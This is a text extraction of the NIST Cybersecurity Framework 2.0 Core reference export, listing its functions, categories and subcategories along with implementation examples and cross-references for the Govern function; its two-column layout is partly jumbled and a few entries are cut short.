csf2 References

NIST Cybersecurity Framework (CSF) 2.
0 Reference Tool
Title The NIST Cybersecurity Framework (CSF) 2.0
Read Me This is a download from the CSF 2.0 Reference Tool, which assists users in exploring the CSF 2.0 Core. This export is a user generated version of the Core ver
Change Log Final

The NIST Cybersecurity Framework 2.0 www.nist.gov/cyberframework
Function Category Subcategory

GOVERN (GV): The organization's
cybersecurity risk management
strategy, expectations, and policy are
established, communicated, and
monitored
Organizational Context (GV.OC): The

circumstances - mission, stakeholder
expectations, dependencies, and legal,
regulatory, and contractual requirements -
surrounding the organization's
cybersecurity risk management decisions
are understood
GV.OC-01: The organizational mission is

understood and informs cybersecurity risk
management
CSF 2.0 Page 2 of 145

GV.OC-02: Internal and external stakeholders
are understood, and their needs and
expectations regarding cybersecurity risk
management are understood and considered

GV.OC-03: Legal, regulatory, and contractual
requirements regarding cybersecurity - including
privacy and civil liberties obligations - are
understood and managed

GV.OC-04: Critical objectives, capabilities, and
services that stakeholders depend on or expect
from the organization are understood and
communicated
GV.OC-05: Outcomes, capabilities, and services

that the organization depends on are
understood and communicated

Risk Management Strategy (GV.RM): The
organization's priorities, constraints, risk
tolerance and appetite statements, and
assumptions are established,
communicated, and used to support
operational risk decisions
GV.RM-01: Risk management objectives are

established and agreed to by organizational
stakeholders
GV.RM-02: Risk appetite and risk tolerance

statements are established, communicated, and
maintained

GV.RM-03: Cybersecurity risk management
activities and outcomes are included in
enterprise risk management processes
GV.RM-04: Strategic direction that describes

appropriate risk response options is established
and communicated

GV.RM-05: Lines of communication across the
organization are established for cybersecurity
risks, including risks from suppliers and other
third parties
GV.RM-06: A standardized method for

calculating, documenting, categorizing, and
prioritizing cybersecurity risks is established and
communicated

GV.RM-07: Strategic opportunities (i.e., positive
risks) are characterized and are included in
organizational cybersecurity risk discussions
Roles, Responsibilities, and Authorities

(GV.RR): Cybersecurity roles,
responsibilities, and authorities to foster
accountability, performance assessment,
and continuous improvement are
established and communicated

GV.RR-01: Organizational leadership is
responsible and accountable for cybersecurity
risk and fosters a culture that is risk-aware,
ethical, and continually improving

GV.RR-02: Roles, responsibilities, and authorities
related to cybersecurity risk management are
established, communicated, understood, and
enforced

GV.RR-03: Adequate resources are allocated
commensurate with the cybersecurity risk
strategy, roles, responsibilities, and policies
GV.RR-04: Cybersecurity is included in human

resources practices
Policy (GV.PO): Organizational

cybersecurity policy is established,
communicated, and enforced

GV.PO-01: Policy for managing cybersecurity
risks is established based on organizational
context, cybersecurity strategy, and priorities
and is communicated and enforced

GV.PO-02: Policy for managing cybersecurity
risks is reviewed, updated, communicated, and
enforced to reflect changes in requirements,
threats, technology, and organizational mission
Oversight (GV.OV): Results of organization-

wide cybersecurity risk management
activities and performance are used to
inform, improve, and adjust the risk
management strategy

GV.OV-01: Cybersecurity risk management
strategy outcomes are reviewed to inform and
adjust strategy and direction

GV.OV-02: The cybersecurity risk management
strategy is reviewed and adjusted to ensure
coverage of organizational requirements and
risks
GV.OV-03: Organizational cybersecurity risk

management performance is evaluated and
reviewed for adjustments needed
Cybersecurity Supply Chain Risk

Management (GV.SC): Cyber supply chain
risk management processes are identified,
established, managed, monitored, and
improved by organizational stakeholders

GV.SC-01: A cybersecurity supply chain risk
management program, strategy, objectives,
policies, and processes are established and
agreed to by organizational stakeholders

GV.SC-02: Cybersecurity roles and
responsibilities for suppliers, customers, and
partners are established, communicated, and
coordinated internally and externally

GV.SC-03: Cybersecurity supply chain risk
management is integrated into cybersecurity
and enterprise risk management, risk
assessment, and improvement processes

GV.SC-04: Suppliers are known and prioritized by
criticality

GV.SC-05: Requirements to address
cybersecurity risks in supply chains are
established, prioritized, and integrated into
contracts and other types of agreements with
suppliers and other relevant third parties

GV.SC-06: Planning and due diligence are
performed to reduce risks before entering into
formal supplier or other third-party relationships

GV.SC-07: The risks posed by a supplier, their
products and services, and other third parties
are understood, recorded, prioritized, assessed,
responded to, and monitored over the course of
the relationship

GV.SC-08: Relevant suppliers and other third
parties are included in incident planning,
response, and recovery activities

GV.SC-09: Supply chain security practices are
integrated into cybersecurity and enterprise risk
management programs, and their performance
is monitored throughout the technology product
and service life cycle

GV.SC-10: Cybersecurity supply chain risk
management plans include provisions for
activities that occur after the conclusion of a
partnership or service agreement
GOVERN (GV)
IDENTIFY (ID): The organization's
current cybersecurity risks are
understood

Asset Management (ID.AM): Assets (e.g.,
data, hardware, software, systems,
facilities, services, people) that enable the
organization to achieve business purposes
are identified and managed consistent with
their relative importance to organizational
objectives and the organization's risk
strategy
ID.AM-01: Inventories of hardware managed by

the organization are maintained
ID.AM-02: Inventories of software, services, and

systems managed by the organization are
maintained

ID.AM-03: Representations of the organization's
authorized network communication and internal
and external network data flows are maintained
ID.AM-04: Inventories of services provided by

suppliers are maintained

ID.AM-05: Assets are prioritized based on
classification, criticality, resources, and impact
on the mission
ID.AM-07: Inventories of data and

corresponding metadata for designated data
types are maintained

ID.AM-08: Systems, hardware, software,
services, and data are managed throughout their
life cycles
Risk Assessment (ID.RA): The cybersecurity

risk to the organization, assets, and
individuals is understood by the
organization

ID.RA-01: Vulnerabilities in assets are identified,
validated, and recorded
ID.RA-02: Cyber threat intelligence is received

from information sharing forums and sources

ID.RA-03: Internal and external threats to the
organization are identified and recorded
ID.RA-04: Potential impacts and likelihoods of

threats exploiting vulnerabilities are identified
and recorded

ID.RA-05: Threats, vulnerabilities, likelihoods,
and impacts are used to understand inherent
risk and inform risk response prioritization
ID.RA-06: Risk responses are chosen, prioritized,

planned, tracked, and communicated

ID.RA-07: Changes and exceptions are managed,
assessed for risk impact, recorded, and tracked
ID.RA-08: Processes for receiving, analyzing, and

responding to vulnerability disclosures are
established

ID.RA-09: The authenticity and integrity of
hardware and software are assessed prior to
acquisition and use
ID.RA-10: Critical suppliers are assessed prior to

acquisition

Improvement (ID.IM): Improvements to
organizational cybersecurity risk
management processes, procedures and
activities are identified across all CSF
Functions

ID.IM-01: Improvements are identified from
evaluations

security tests and exercises, including those
done in coordination with suppliers and relevant
third parties

execution of operational processes, procedures,
and activities

ID.IM-04: Incident response plans and other
cybersecurity plans that affect operations are
established, communicated, maintained, and
improved
IDENTIFY (ID)
PROTECT (PR): Safeguards to manage
the organization's cybersecurity risks
are used

Identity Management, Authentication, and
Access Control (PR.AA): Access to physical
and logical assets is limited to authorized
users, services, and hardware and
managed commensurate with the assessed
risk of unauthorized access
PR.AA-01: Identities and credentials for

authorized users, services, and hardware are
managed by the organization

PR.AA-02: Identities are proofed and bound to
credentials based on the context of interactions
PR.AA-03: Users, services, and hardware are

authenticated

PR.AA-04: Identity assertions are protected,
conveyed, and verified

PR.AA-05: Access permissions, entitlements, and
authorizations are defined in a policy, managed,
enforced, and reviewed, and incorporate the
principles of least privilege and separation of
duties

PR.AA-06: Physical access to assets is managed,
monitored, and enforced commensurate with
risk
Awareness and Training (PR.AT): The

organization's personnel are provided with
cybersecurity awareness and training so
that they can perform their cybersecurity-
related tasks

PR.AT-01: Personnel are provided with
awareness and training so that they possess the
knowledge and skills to perform general tasks
with cybersecurity risks in mind

PR.AT-02: Individuals in specialized roles are
provided with awareness and training so that
they possess the knowledge and skills to
perform relevant tasks with cybersecurity risks in
mind
Data Security (PR.DS): Data are managed

consistent with the organization's risk
strategy to protect the confidentiality,
integrity, and availability of information

PR.DS-01: The confidentiality, integrity, and
availability of data-at-rest are protected

availability of data-in-transit are protected

availability of data-in-use are protected

PR.DS-11: Backups of data are created,
protected, maintained, and tested
Platform Security (PR.PS): The hardware,

software (e.g., firmware, operating systems,
applications), and services of physical and
virtual platforms are managed consistent
with the organization's risk strategy to
protect their confidentiality, integrity, and
availability

PR.PS-01: Configuration management practices
are established and applied

PR.PS-02: Software is maintained, replaced, and
removed commensurate with risk

PR.PS-03: Hardware is maintained, replaced, and
removed commensurate with risk
PR.PS-04: Log records are generated and made

available for continuous monitoring

PR.PS-05: Installation and execution of
unauthorized software are prevented
PR.PS-06: Secure software development

practices are integrated, and their performance
is monitored throughout the software
development life cycle

Technology Infrastructure Resilience
(PR.IR): Security architectures are managed
with the organization's risk strategy to
protect asset confidentiality, integrity, and
availability, and organizational resilience
PR.IR-01: Networks and environments are

protected from unauthorized logical access and
usage

PR.IR-02: The organization's technology assets
are protected from environmental threats
PR.IR-03: Mechanisms are implemented to

achieve resilience requirements in normal and
adverse situations
PR.IR-04: Adequate resource capacity to ensure

availability is maintained

PROTECT (PR)
DETECT (DE): Possible cybersecurity
attacks and compromises are found
and analyzed
Continuous Monitoring (DE.CM): Assets are

monitored to find anomalies, indicators of
compromise, and other potentially adverse
events
DE.CM-01: Networks and network services are

monitored to find potentially adverse events

DE.CM-02: The physical environment is
DE.CM-03: Personnel activity and technology

usage are monitored to find potentially adverse
events

DE.CM-06: External service provider activities
and services are monitored to find potentially
adverse events

DE.CM-09: Computing hardware and software,
runtime environments, and their data are
Adverse Event Analysis (DE.AE): Anomalies,

indicators of compromise, and other
potentially adverse events are analyzed to
characterize the events and detect
cybersecurity incidents

DE.AE-02: Potentially adverse events are
analyzed to better understand associated
activities
DE.AE-03: Information is correlated from

multiple sources

DE.AE-04: The estimated impact and scope of
adverse events are understood
DE.AE-06: Information on adverse events is

provided to authorized staff and tools

DE.AE-07: Cyber threat intelligence and other
contextual information are integrated into the
analysis
DE.AE-08: Incidents are declared when adverse

events meet the defined incident criteria
DETECT (DE)
RESPOND (RS): Actions regarding a
detected cybersecurity incident are
taken
Incident Management (RS.MA): Responses

to detected cybersecurity incidents are
managed

RS.MA-01: The incident response plan is
executed in coordination with relevant third
parties once an incident is declared
RS.MA-02: Incident reports are triaged and

validated
RS.MA-03: Incidents are categorized and

prioritized

RS.MA-04: Incidents are escalated or elevated as
needed
RS.MA-05: The criteria for initiating incident

recovery are applied
Incident Analysis (RS.AN): Investigations

are conducted to ensure effective response
and support forensics and recovery
activities
RS.AN-03: Analysis is performed to establish

what has taken place during an incident and the
root cause of the incident

RS.AN-06: Actions performed during an
investigation are recorded, and the records'
integrity and provenance are preserved
RS.AN-07: Incident data and metadata are

collected, and their integrity and provenance are
preserved
RS.AN-08: An incident's magnitude is estimated

and validated
Incident Response Reporting and

Communication (RS.CO): Response
activities are coordinated with internal and
external stakeholders as required by laws,
regulations, or policies

RS.CO-02: Internal and external stakeholders are
notified of incidents
RS.CO-03: Information is shared with designated

internal and external stakeholders

Incident Mitigation (RS.MI): Activities are
performed to prevent expansion of an
event and mitigate its effects
RS.MI-01: Incidents are contained

RS.MI-02: Incidents are eradicated
RESPOND (RS)
RECOVER (RC): Assets and operations
affected by a cybersecurity incident
are restored
Incident Recovery Plan Execution (RC.RP):

Restoration activities are performed to
ensure operational availability of systems
and services affected by cybersecurity
incidents
RC.RP-01: The recovery portion of the incident

response plan is executed once initiated from
the incident response process

RC.RP-02: Recovery actions are selected, scoped,
prioritized, and performed
RC.RP-03: The integrity of backups and other

restoration assets is verified before using them
for restoration
RC.RP-04: Critical mission functions and

cybersecurity risk management are considered
to establish post-incident operational norms
RC.RP-05: The integrity of restored assets is

verified, systems and services are restored, and
normal operating status is confirmed

RC.RP-06: The end of incident recovery is
declared based on criteria, and incident-related
documentation is completed
Incident Recovery Communication (RC.CO):

Restoration activities are coordinated with
internal and external parties
RC.CO-03: Recovery activities and progress in

restoring operational capabilities are
communicated to designated internal and
external stakeholders

RC.CO-04: Public updates on incident recovery
are shared using approved methods and
messaging
RECOVER (RC)

Implementation Examples Informative References
CRI Profile v2.0: GV
CSF v1.1: ID.GV
SP 800-221A: GV.PO
CRI Profile v2.0: GV.OC

CSF v1.1: ID.BE
SP 800-221A: GV.CT
SP 800-221A: GV.CT-5
Ex1: Share the organization's mission (e.g., CRI Profile v2.0: GV.OC-01
through vision and mission statements, CRI Profile v2.0: GV.OC-01.01
marketing, and service strategies) to CSF v1.1: ID.BE-2
provide a basis for identifying risks that may CSF v1.1: ID.BE-3
impede that mission SP 800-221A: GV.CT-5
SP 800-221A: GV.CT-3
SP 800-53 Rev 5.1.1: PM-11

Ex1: Identify relevant internal stakeholders CRI Profile v2.0: GV.OC-02
and their cybersecurity-related CRI Profile v2.0: GV.OC-02.01
expectations (e.g., performance and risk CRI Profile v2.0: GV.OC-02.02
expectations of officers, directors, and CRI Profile v2.0: GV.OC-02.03
advisors; cultural expectations of CSF v1.1: ID.SC-2
employees) CSF v1.1: ID.GV-2
Ex2: Identify relevant external stakeholders SP 800-218: PO.2.1
and their cybersecurity-related SP 800-221A: GV.OV-2
expectations (e.g., privacy expectations of SP 800-221A: GV.CT-2
customers, business expectations of SP 800-221A: GV.CT-3
partnerships, compliance expectations of SP 800-53 Rev 5.1.1: PM-09
regulators, ethics expectations of society) SP 800-53 Rev 5.1.1: PM-18
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: SR-03
SP 800-53 Rev 5.1.1: SR-05
SP 800-53 Rev 5.1.1: SR-06
SP 800-53 Rev 5.1.1: SR-08

Ex1: Determine a process to track and CRI Profile v2.0: GV.OC-03
manage legal and regulatory requirements CRI Profile v2.0: GV.OC-03.01
regarding protection of individuals' CRI Profile v2.0: GV.OC-03.02
information (e.g., Health Insurance CSF v1.1: ID.GV-3
Portability and Accountability Act, California SP 800-218: PO.1.1
Consumer Privacy Act, General Data SP 800-218: PO.1.2
Protection Regulation) SP 800-53 Rev 5.1.1: AC-01
Ex2: Determine a process to track and SP 800-53 Rev 5.1.1: AT-01
manage contractual requirements for SP 800-53 Rev 5.1.1: AU-01
cybersecurity management of supplier, SP 800-53 Rev 5.1.1: CA-01
customer, and partner information SP 800-53 Rev 5.1.1: CM-01
Ex3: Align the organization's cybersecurity SP 800-53 Rev 5.1.1: CP-01
strategy with legal, regulatory, and SP 800-53 Rev 5.1.1: IA-01
contractual requirements SP 800-53 Rev 5.1.1: IR-01
SP 800-53 Rev 5.1.1: MA-01
SP 800-53 Rev 5.1.1: MP-01
SP 800-53 Rev 5.1.1: PE-01
SP 800-53 Rev 5.1.1: PL-01
SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01
SP 800-53 Rev 5.1.1: PM-28
SP 800-53 Rev 5.1.1: PT

Ex1: Establish criteria for determining the CRI Profile v2.0: GV.OC-04
criticality of capabilities and services as CRI Profile v2.0: GV.OC-04.01
viewed by internal and external CRI Profile v2.0: GV.OC-04.02
stakeholders CRI Profile v2.0: GV.OC-04.03
Ex2: Determine (e.g., from a business CRI Profile v2.0: GV.OC-04.04
impact analysis) assets and business CSF v1.1: ID.BE-4
operations that are vital to achieving CSF v1.1: ID.BE-5
mission objectives and the potential impact SP 800-221A: MA.RI-1
of a loss (or partial loss) of such operations SP 800-53 Rev 5.1.1: PM-08
Ex3: Establish and communicate resilience SP 800-53 Rev 5.1.1: PM-11
objectives (e.g., recovery time objectives) SP 800-53 Rev 5.1.1: CP-02(08)
for delivering critical capabilities and SP 800-53 Rev 5.1.1: PM-30(01)
services in various operating states (e.g., SP 800-53 Rev 5.1.1: RA-09
under attack, during recovery, normal
operation)
Ex1: Create an inventory of the CRI Profile v2.0: GV.OC-05

organization's dependencies on external CRI Profile v2.0: GV.OC-05.01
resources (e.g., facilities, cloud-based CRI Profile v2.0: GV.OC-05.02
hosting providers) and their relationships to CRI Profile v2.0: GV.OC-05.03
organizational assets and business CRI Profile v2.0: GV.OC-05.04
functions CSF v1.1: ID.BE-1
Ex2: Identify and document external CSF v1.1: ID.BE-4
dependencies that are potential points of SP 800-221A: GV.CT-5
failure for the organization's critical SP 800-221A: MA.RI-1
capabilities and services, and share that SP 800-53 Rev 5.1.1: PM-11
information with appropriate personnel SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: RA-07
SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SR-05

CRI Profile v2.0: GV.RM
CSF v1.1: ID.RM
SP 800-221A: GV.BE-3
Ex1: Update near-term and long-term CRI Profile v2.0: GV.RM-01

cybersecurity risk management objectives CRI Profile v2.0: GV.RM-01.01
as part of annual strategic planning and CRI Profile v2.0: GV.RM-01.02
when major changes occur CRI Profile v2.0: GV.RM-01.03
Ex2: Establish measurable objectives for CRI Profile v2.0: GV.RM-01.04
cybersecurity risk management (e.g., CRI Profile v2.0: GV.RM-01.05
manage the quality of user training, ensure CSF v1.1: ID.RM-1
adequate risk protection for industrial SP 800-221A: GV.RR-2
control systems) SP 800-53 Rev 5.1.1: PM-09
Ex3: Senior leaders agree about SP 800-53 Rev 5.1.1: RA-07
cybersecurity objectives and use them for SP 800-53 Rev 5.1.1: SR-02
measuring and managing risk and
performance
Ex1: Determine and communicate risk CRI Profile v2.0: GV.RM-02

appetite statements that convey CRI Profile v2.0: GV.RM-02.01
expectations about the appropriate level of CRI Profile v2.0: GV.RM-02.02
risk for the organization CRI Profile v2.0: GV.RM-02.03
Ex2: Translate risk appetite statements into CSF v1.1: ID.RM-2
specific, measurable, and broadly CSF v1.1: ID.RM-3
understandable risk tolerance statements SP 800-221A: GV.BE-1
Ex3: Refine organizational objectives and SP 800-221A: GV.BE-3
risk appetite periodically based on known SP 800-53 Rev 5.1.1: PM-09
risk exposure and residual risk

Ex1: Aggregate and manage cybersecurity CRI Profile v2.0: GV.RM-03
risks alongside other enterprise risks (e.g., CRI Profile v2.0: GV.RM-03.01
compliance, financial, operational, CRI Profile v2.0: GV.RM-03.02
regulatory, reputational, safety) CRI Profile v2.0: GV.RM-03.03
Ex2: Include cybersecurity risk managers in CRI Profile v2.0: GV.RM-03.04
enterprise risk management planning CSF v1.1: ID.GV-4
Ex3: Establish criteria for escalating SP 800-221A: GV.PO-2
cybersecurity risks within enterprise risk SP 800-221A: GV.PO-3
management SP 800-53 Rev 5.1.1: PM-03
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: RA-07
SP 800-53 Rev 5.1.1: SR-02
Ex1: Specify criteria for accepting and CRI Profile v2.0: GV.RM-04
avoiding cybersecurity risk for various CRI Profile v2.0: GV.RM-04.01
classifications of data CSF v1.1: ID.RM-2
Ex2: Determine whether to purchase SP 800-221A: GV.BE-1
cybersecurity insurance SP 800-53 Rev 5.1.1: PM-09
Ex3: Document conditions under which SP 800-53 Rev 5.1.1: PM-28
shared responsibility models are acceptable SP 800-53 Rev 5.1.1: PM-30
(e.g., outsourcing certain cybersecurity SP 800-53 Rev 5.1.1: SR-02
functions, having a third party perform
financial transactions on behalf of the
organization, using public cloud-based
services)

Ex1: Determine how to update senior CRI Profile v2.0: GV.RM-05
executives, directors, and management on CRI Profile v2.0: GV.RM-05.01
the organization's cybersecurity posture at CRI Profile v2.0: GV.RM-05.02
agreed-upon intervals CSF v1.1: ID.SC-1
Ex2: Identify how all departments across SP 800-221A: GV.PO-1
the organization - such as management, SP 800-53 Rev 5.1.1: PM-09
operations, internal auditors, legal, SP 800-53 Rev 5.1.1: PM-30
acquisition, physical security, and HR - will
communicate with each other about
cybersecurity risks
Ex1: Establish criteria for using a CRI Profile v2.0: GV.RM-06

quantitative approach to cybersecurity risk CRI Profile v2.0: GV.RM-06.01
analysis, and specify probability and CSF v1.1: ID.RM-1
exposure formulas SP 800-221A: GV.RR-2
Ex2: Create and use templates (e.g., a risk SP 800-53 Rev 5.1.1: PM-09
register) to document cybersecurity risk SP 800-53 Rev 5.1.1: PM-18
information (e.g., risk description, SP 800-53 Rev 5.1.1: PM-28
exposure, treatment, and ownership) SP 800-53 Rev 5.1.1: PM-30
Ex3: Establish criteria for risk prioritization SP 800-53 Rev 5.1.1: RA-03
at the appropriate levels within the
enterprise
Ex4: Use a consistent list of risk categories
to support integrating, aggregating, and
comparing cybersecurity risks

Ex1: Define and communicate guidance and CRI Profile v2.0: GV.RM-07
methods for identifying opportunities and CRI Profile v2.0: GV.RM-07.01
including them in risk discussions (e.g., SP 800-53 Rev 5.1.1: PM-09
strengths, weaknesses, opportunities, and SP 800-53 Rev 5.1.1: PM-18
threats [SWOT] analysis) SP 800-53 Rev 5.1.1: PM-28
Ex2: Identify stretch goals and document SP 800-53 Rev 5.1.1: PM-30
them SP 800-53 Rev 5.1.1: RA-03
Ex3: Calculate, document, and prioritize
positive risks alongside negative risks
CRI Profile v2.0: GV.RR

CSF v1.1: ID.GV-2
SP 800-218: PO.2.1
SP 800-221A: GV.OV-2

Ex1: Leaders (e.g., directors) agree on their CIS Controls v8.0: 14.1
roles and responsibilities in developing, CRI Profile v2.0: GV.RR-01
implementing, and assessing the CRI Profile v2.0: GV.RR-01.01
organization's cybersecurity strategy CRI Profile v2.0: GV.RR-01.02
Ex2: Share leaders' expectations regarding a CRI Profile v2.0: GV.RR-01.03
secure and ethical culture, especially when CRI Profile v2.0: GV.RR-01.04
current events present the opportunity to CRI Profile v2.0: GV.RR-01.05
highlight positive or negative examples of SP 800-218: PO.2.3
cybersecurity risk management SP 800-53 Rev 5.1.1: PM-02
Ex3: Leaders direct the CISO to maintain a SP 800-53 Rev 5.1.1: PM-19
comprehensive cybersecurity risk strategy SP 800-53 Rev 5.1.1: PM-23
and review and update it at least annually SP 800-53 Rev 5.1.1: PM-24
and after major events SP 800-53 Rev 5.1.1: PM-29
Ex4: Conduct reviews to ensure adequate
authority and coordination among those
responsible for managing cybersecurity risk

Ex1: Document risk management roles and CIS Controls v8.0: 14.9
responsibilities in policy CRI Profile v2.0: GV.RR-02
Ex2: Document who is responsible and CRI Profile v2.0: GV.RR-02.01
accountable for cybersecurity risk CRI Profile v2.0: GV.RR-02.02
management activities and how those CRI Profile v2.0: GV.RR-02.03
teams and individuals are to be consulted CRI Profile v2.0: GV.RR-02.04
and informed CRI Profile v2.0: GV.RR-02.05
Ex3: Include cybersecurity responsibilities CRI Profile v2.0: GV.RR-02.06
and performance requirements in CRI Profile v2.0: GV.RR-02.07
personnel descriptions CSF v1.1: ID.AM-6
Ex4: Document performance goals for CSF v1.1: ID.GV-2
personnel with cybersecurity risk CSF v1.1: DE.DP-1
management responsibilities, and SP 800-218: PO.2.1
periodically measure performance to SP 800-221A: GV.RR-1
identify areas for improvement SP 800-221A: GV.RR-2
Ex5: Clearly articulate cybersecurity SP 800-221A: GV.OV-2
responsibilities within operations, risk SP 800-53 Rev 5.1.1: PM-02
functions, and internal audit functions SP 800-53 Rev 5.1.1: PM-13
SP 800-53 Rev 5.1.1: PM-19
SP 800-53 Rev 5.1.1: PM-23
SP 800-53 Rev 5.1.1: PM-24
SP 800-53 Rev 5.1.1: PM-29

Ex1: Conduct periodic management reviews CRI Profile v2.0: GV.RR-03
to ensure that those given cybersecurity CRI Profile v2.0: GV.RR-03.01
risk management responsibilities have the CRI Profile v2.0: GV.RR-03.02
necessary authority CRI Profile v2.0: GV.RR-03.03
Ex2: Identify resource allocation and CSF v1.1: ID.RM-1
investment in line with risk tolerance and SP 800-221A: GV.RR-2
response SP 800-53 Rev 5.1.1: PM-03
Ex3: Provide adequate and sufficient
people, process, and technical resources to
support the cybersecurity strategy
Ex1: Integrate cybersecurity risk CIS Controls v8.0: 6.1

management considerations into human CIS Controls v8.0: 6.2
resources processes (e.g., personnel CRI Profile v2.0: GV.RR-04
screening, onboarding, change notification, CRI Profile v2.0: GV.RR-04.01
offboarding) CRI Profile v2.0: GV.RR-04.02
Ex2: Consider cybersecurity knowledge to CRI Profile v2.0: GV.RR-04.03
be a positive factor in hiring, training, and CSF v1.1: PR.IP-11
retention decisions SP 800-53 Rev 5.1.1: PM-13
Ex3: Conduct background checks prior to SP 800-53 Rev 5.1.1: PS-01
onboarding new personnel for sensitive SP 800-53 Rev 5.1.1: PS-07
roles, and periodically repeat background SP 800-53 Rev 5.1.1: PS-09
checks for personnel with such roles
Ex4: Define and enforce obligations for
personnel to be aware of, adhere to, and
uphold security policies as they relate to
their roles
CRI Profile v2.0: GV.PO

CSF v1.1: ID.GV-1
SP 800-221A: GV.PO-1

Ex1: Create, disseminate, and maintain an CRI Profile v2.0: GV.PO-01
understandable, usable risk management CRI Profile v2.0: GV.PO-01.01
policy with statements of management CRI Profile v2.0: GV.PO-01.02
intent, expectations, and direction CRI Profile v2.0: GV.PO-01.03
Ex2: Periodically review policy and CRI Profile v2.0: GV.PO-01.04
supporting processes and procedures to CRI Profile v2.0: GV.PO-01.05
ensure that they align with risk CRI Profile v2.0: GV.PO-01.06
management strategy objectives and CRI Profile v2.0: GV.PO-01.07
priorities, as well as the high-level direction CRI Profile v2.0: GV.PO-01.08
of the cybersecurity policy CSF v1.1: ID.GV-1
Ex3: Require approval from senior SP 800-221A: GV.PO-1
management on policy SP 800-53 Rev 5.1.1: AC-01
Ex4: Communicate cybersecurity risk SP 800-53 Rev 5.1.1: AT-01
management policy and supporting SP 800-53 Rev 5.1.1: AU-01
processes and procedures across the SP 800-53 Rev 5.1.1: CA-01
organization SP 800-53 Rev 5.1.1: CM-01
Ex5: Require personnel to acknowledge SP 800-53 Rev 5.1.1: CP-01
receipt of policy when first hired, annually, SP 800-53 Rev 5.1.1: IA-01
and whenever policy is updated SP 800-53 Rev 5.1.1: IR-01
SP 800-53 Rev 5.1.1: MA-01
SP 800-53 Rev 5.1.1: MP-01
SP 800-53 Rev 5.1.1: PE-01
SP 800-53 Rev 5.1.1: PL-01
SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01

Ex1: Update policy based on periodic CRI Profile v2.0: GV.PO-02
reviews of cybersecurity risk management CRI Profile v2.0: GV.PO-02.01
results to ensure that policy and supporting CSF v1.1: ID.GV-1
processes and procedures adequately SP 800-221A: GV.PO-1
maintain risk at an acceptable level SP 800-53 Rev 5.1.1: AC-01
Ex2: Provide a timeline for reviewing SP 800-53 Rev 5.1.1: AT-01
changes to the organization's risk SP 800-53 Rev 5.1.1: AU-01
environment (e.g., changes in risk or in the SP 800-53 Rev 5.1.1: CA-01
organization's mission objectives), and SP 800-53 Rev 5.1.1: CM-01
communicate recommended policy updates SP 800-53 Rev 5.1.1: CP-01
Ex3: Update policy to reflect changes in SP 800-53 Rev 5.1.1: IA-01
legal and regulatory requirements SP 800-53 Rev 5.1.1: IR-01
Ex4: Update policy to reflect changes in SP 800-53 Rev 5.1.1: MA-01
technology (e.g., adoption of artificial SP 800-53 Rev 5.1.1: MP-01
intelligence) and changes to the business SP 800-53 Rev 5.1.1: PE-01
(e.g., acquisition of a new business, new SP 800-53 Rev 5.1.1: PL-01
contract requirements) SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01
CRI Profile v2.0: GV.OV

Ex1: Measure how well the risk CRI Profile v2.0: GV.OV-01
management strategy and risk results have CRI Profile v2.0: GV.OV-01.01
helped leaders make decisions and achieve CRI Profile v2.0: GV.OV-01.02
organizational objectives CRI Profile v2.0: GV.OV-01.03
Ex2: Examine whether cybersecurity risk SP 800-221A: GV.AD-3
strategies that impede operations or SP 800-53 Rev 5.1.1: AC-01
innovation should be adjusted SP 800-53 Rev 5.1.1: AT-01
SP 800-53 Rev 5.1.1: AU-01
SP 800-53 Rev 5.1.1: CA-01
SP 800-53 Rev 5.1.1: CM-01
SP 800-53 Rev 5.1.1: CP-01
SP 800-53 Rev 5.1.1: IA-01
SP 800-53 Rev 5.1.1: IR-01
SP 800-53 Rev 5.1.1: MA-01
SP 800-53 Rev 5.1.1: MP-01
SP 800-53 Rev 5.1.1: PE-01
SP 800-53 Rev 5.1.1: PL-01
SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-18
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: PM-31
SP 800-53 Rev 5.1.1: RA-07
SP 800-53 Rev 5.1.1: SR-06

Ex1: Review audit findings to confirm CRI Profile v2.0: GV.OV-02
whether the existing cybersecurity strategy CRI Profile v2.0: GV.OV-02.01
has ensured compliance with internal and CRI Profile v2.0: GV.OV-02.02
external requirements SP 800-221A: GV.AD-2
Ex2: Review the performance oversight of SP 800-221A: GV.AD-3
those in cybersecurity-related roles to SP 800-221A: MA.RM-8
determine whether policy changes are SP 800-53 Rev 5.1.1: PM-09
necessary SP 800-53 Rev 5.1.1: PM-19
Ex3: Review strategy in light of SP 800-53 Rev 5.1.1: PM-30
cybersecurity incidents SP 800-53 Rev 5.1.1: PM-31
SP 800-53 Rev 5.1.1: RA-07
SP 800-53 Rev 5.1.1: SR-06
Ex1: Review key performance indicators CRI Profile v2.0: GV.OV-03

(KPIs) to ensure that organization-wide CRI Profile v2.0: GV.OV-03.01
policies and procedures achieve objectives CRI Profile v2.0: GV.OV-03.02
Ex2: Review key risk indicators (KRIs) to SP 800-221A: GV.OV-2
